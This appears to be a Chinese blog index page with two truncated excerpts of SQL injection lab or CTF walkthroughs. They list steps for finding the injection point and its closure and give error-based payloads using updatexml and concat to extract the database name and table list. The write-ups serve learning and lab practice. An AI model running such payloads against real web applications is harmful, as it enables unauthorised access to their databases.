摘要: 1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml( 阅读全文
posted @ 2021-09-26 17:23 Nuyoah_QQ 阅读(38) 评论(0) 推荐(0)
摘要: 1.常规方法测试判断注入点 2.爆数据库 ?id=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 3.查看当前库下的所有表格:ECII73SA8M ?id=1 and updatexml(1,concat(0x7e,(select gro 阅读全文
posted @ 2021-09-26 15:14 Nuyoah_QQ 阅读(31) 评论(0) 推荐(0)